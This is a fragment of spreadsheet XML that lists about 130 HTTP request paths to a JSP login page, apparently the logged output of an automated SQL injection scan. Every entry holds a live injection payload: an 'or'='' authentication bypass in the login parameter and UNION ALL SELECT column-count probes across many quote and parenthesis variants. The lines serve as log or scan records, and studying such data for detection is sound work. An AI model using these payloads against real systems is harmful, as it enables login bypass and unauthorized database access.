    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect3676,3676,3676,3676,3676,3676,3676,3676#and('wnjn'='wnjn</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect1091,1091,1091,1091,1091,1091,1091,1091,1091#and('ciem'='ciem</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect2454,2454,2454,2454,2454,2454,2454,2454,2454,2454#and('lcyp'='lcyp</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect6710#and(('bygb'='bygb</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect6353,6353#and(('ayoq'='ayoq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect3306,3306,3306#and(('dfxd'='dfxd</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect5184,5184,5184,5184#and(('gcvt'='gcvt</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect6021,6021,6021,6021,6021#and(('fmae'='fmae</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect253,253,253,253,253,253#and(('jznb'='jznb</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect9450,9450,9450,9450,9450,9450,9450#and(('wkhy'='wkhy</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect1311,1311,1311,1311,1311,1311,1311,1311#and(('dhex'='dhex</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect5103,5103,5103,5103,5103,5103,5103,5103,5103#and(('lfyr'='lfyr</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect1475,1475,1475,1475,1475,1475,1475,1475,1475,1475#and(('jvey'='jvey</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect3829#and((('ojyy'='ojyy</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect3423,3423#and((('rboe'='rboe</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect5977,5977,5977#and((('dcis'='dcis</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect149,149,149,149#and((('qulg'='qulg</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect761,761,761,761,761#and((('ozks'='ozks</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect4001,4001,4001,4001,4001,4001#and((('gwin'='gwin</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect5843,5843,5843,5843,5843,5843,5843#and((('jjyb'='jjyb</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect8428,8428,8428,8428,8428,8428,8428,8428#and((('ojly'='ojly</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect5759,5759,5759,5759,5759,5759,5759,5759,5759#and((('jswx'='jswx</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect856,856,856,856,856,856,856,856,856,856#and((('brne'='brne</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect7230#and'jlei'='jlei</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect8141,8141#and'iilz'='iilz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect3261,3261,3261#and'xemg'='xemg</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect1702,1702,1702,1702#and'hlwc'='hlwc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect7101,7101,7101,7101,7101#and'avph'='avph</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect9480,9480,9480,9480,9480,9480#and'losk'='losk</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect4867,4867,4867,4867,4867,4867,4867#and'bdjh'='bdjh</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect2248,2248,2248,2248,2248,2248,2248,2248#and'pyci'='pyci</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect1683,1683,1683,1683,1683,1683,1683,1683,1683#and'qdlw'='qdlw</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect355,355,355,355,355,355,355,355,355,355#and'lele'='lele</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect9459#and('feti'like'feti</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect5356,5356#and('sgvc'like'sgvc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect6843,6843,6843#and('xvtw'like'xvtw</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect4954,4954,4954,4954#and('hygx'like'hygx</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect2304,2304,2304,2304,2304#and('ghkg'like'ghkg</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect4073,4073,4073,4073,4073,4073#and('kmun'like'kmun</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect9098,9098,9098,9098,9098,9098,9098#and('zhbp'like'zhbp</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect1028,1028,1028,1028,1028,1028,1028,1028#and('oxhv'like'oxhv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect3931,3931,3931,3931,3931,3931,3931,3931,3931#and('sktj'like'sktj</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect2553,2553,2553,2553,2553,2553,2553,2553,2553,2553#and('fzsm'like'fzsm</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect6313#and(('hyqp'like'hyqp</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect199,199#and(('tarz'like'tarz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect8157,8157,8157#and(('lkbu'like'lkbu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect3268,3268,3268,3268#and(('lpwq'like'lpwq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect1250,1250,1250,1250,1250#and(('pnqj'like'pnqj</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect778,778,778,778,778,778#and(('mjhv'like'mjhv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect5296,5296,5296,5296,5296,5296,5296#and(('bcnr'like'bcnr</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect4847,4847,4847,4847,4847,4847,4847,4847#and(('rtee'like'rtee</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect9218,9218,9218,9218,9218,9218,9218,9218,9218#and(('puui'like'puui</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect8748,8748,8748,8748,8748,8748,8748,8748,8748,8748#and(('qlrw'like'qlrw</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect139#and((('mmrz'like'mmrz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect3283,3283#and((('kaqs'like'kaqs</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect8125,8125,8125#and((('yeuc'like'yeuc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect1220,1220,1220,1220#and((('eixh'like'eixh</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect4648,4648,4648,4648,4648#and((('lbid'like'lbid</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect2812,2812,2812,2812,2812,2812#and((('ccri'like'ccri</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect1927,1927,1927,1927,1927,1927,1927#and((('cmig'like'cmig</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect155,155,155,155,155,155,155,155#and((('dwfb'like'dwfb</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect3306,3306,3306,3306,3306,3306,3306,3306,3306#and((('sigs'like'sigs</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect421,421,421,421,421,421,421,421,421,421#and((('abta'like'abta</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect8182#and'gjwo'like'gjwo</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect2093,2093#and'dqrw'like'dqrw</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect7161,7161,7161#and'miim'like'miim</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect4949,4949,4949,4949#and'jnuz'like'jnuz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect1376,1376,1376,1376,1376#and'ulqp'like'ulqp</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect9858,9858,9858,9858,9858,9858#and'vbcd'like'vbcd</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect6137,6137,6137,6137,6137,6137,6137#and'evgh'like'evgh</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect8441,8441,8441,8441,8441,8441,8441,8441#and'waij'like'waij</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect6373,6373,6373,6373,6373,6373,6373,6373,6373#and'eflu'like'eflu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect4854,4854,4854,4854,4854,4854,4854,4854,4854,4854#and'qdwq'like'qdwq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect1524#and("fkmj"="fkmj</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect7533,7533#and("xyxx"="xyxx</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect5923,5923,5923#and("dvek"="dvek</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect3583,3583,3583,3583#and("dafq"="dafq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect7974,7974,7974,7974,7974#and("tvqd"="tvqd</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect689,689,689,689,689,689#and("nzqa"="nzqa</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect4547,4547,4547,4547,4547,4547,4547#and("qguv"="qguv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect8272,8272,8272,8272,8272,8272,8272,8272#and("woxm"="woxm</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect2112,2112,2112,2112,2112,2112,2112,2112,2112#and("dgqm"="dgqm</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect6562,6562,6562,6562,6562,6562,6562,6562,6562,6562#and("rghd"="rghd</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect2556#and(("dbnv"="dbnv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect1488,1488#and(("szhc"="szhc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect2988,2988,2988#and(("uvqz"="uvqz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect1792,1792,1792,1792#and(("tmrz"="tmrz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect6855,6855,6855,6855,6855#and(("sdju"="sdju</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect9511,9511,9511,9511,9511,9511#and(("wuca"="wuca</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect3744,3744,3744,3744,3744,3744,3744#and(("kgfi"="kgfi</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect7451,7451,7451,7451,7451,7451,7451,7451#and(("qjic"="qjic</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect7920,7920,7920,7920,7920,7920,7920,7920,7920#and(("lcqk"="lcqk</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect1974,1974,1974,1974,1974,1974,1974,1974,1974,1974#and(("paly"="paly</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect4313#and((("engk"="engk</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect855,855#and((("hqjh"="hqjh</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect6920,6920,6920#and((("hkdu"="hkdu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect3867,3867,3867,3867#and((("wtao"="wtao</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect3766,3766,3766,3766,3766#and((("srqe"="srqe</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect4730,4730,4730,4730,4730,4730#and((("cddl"="cddl</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect7710,7710,7710,7710,7710,7710,7710#and((("pzki"="pzki</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect4804,4804,4804,4804,4804,4804,4804,4804#and((("jnnb"="jnnb</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect41,41,41,41,41,41,41,41,41#and((("johc"="johc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect9157,9157,9157,9157,9157,9157,9157,9157,9157,9157#and((("gyht"="gyht</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect2386#and"jksz"="jksz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect6610,6610#and"uhwz"="uhwz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect2621,2621,2621#and"thiw"="thiw</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect2281,2281,2281,2281#and"rxks"="rxks</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect9227,9227,9227,9227,9227#and"fbsv"="fbsv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect4450,4450,4450,4450,4450,4450#and"zmka"="zmka</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect8634,8634,8634,8634,8634,8634,8634#and"mpqj"="mpqj</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect7675,7675,7675,7675,7675,7675,7675,7675#and"bqqr"="bqqr</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect9111,9111,9111,9111,9111,9111,9111,9111,9111#and"smqx"="smqx</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect7238,7238,7238,7238,7238,7238,7238,7238,7238,7238#and"fvcj"="fvcj</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect4818#and("iaga"like"iaga</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect9313,9313#and("ttuo"like"ttuo</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect6071,6071,6071#and("injw"like"injw</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect2038,2038,2038,2038#and("xdpc"like"xdpc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect6434,6434,6434,6434,6434#and("jfpv"like"jfpv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect8230,8230,8230,8230,8230,8230#and("dblu"like"dblu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect4767,4767,4767,4767,4767,4767,4767#and("gkin"like"gkin</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect7580,7580,7580,7580,7580,7580,7580,7580#and("ktpy"like"ktpy</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect973,973,973,973,973,973,973,973,973#and("ikwm"like"ikwm</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect7011,7011,7011,7011,7011,7011,7011,7011,7011,7011#and("lryy"like"lryy</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect2724#and(("tmsw"like"tmsw</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect5140,5140#and(("dayh"like"dayh</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect341,341,341#and(("oign"like"oign</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect6147,6147,6147,6147#and(("feqx"like"feqx</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect9856,9856,9856,9856,9856#and(("xidd"like"xidd</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect5224,5224,5224,5224,5224,5224#and(("glgh"like"glgh</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect5927,5927,5927,5927,5927,5927,5927#and(("pixo"like"pixo</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect4819,4819,4819,4819,4819,4819,4819,4819#and(("qunx"like"qunx</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect218,218,218,218,218,218,218,218,218#and(("sqxb"like"sqxb</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect1658,1658,1658,1658,1658,1658,1658,1658,1658,1658#and(("vgao"like"vgao</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect5048#and((("lkvf"like"lkvf</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect9934,9934#and((("uqny"like"uqny</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect2979,2979,2979#and((("qaut"like"qaut</t>
  </si>
  <si>
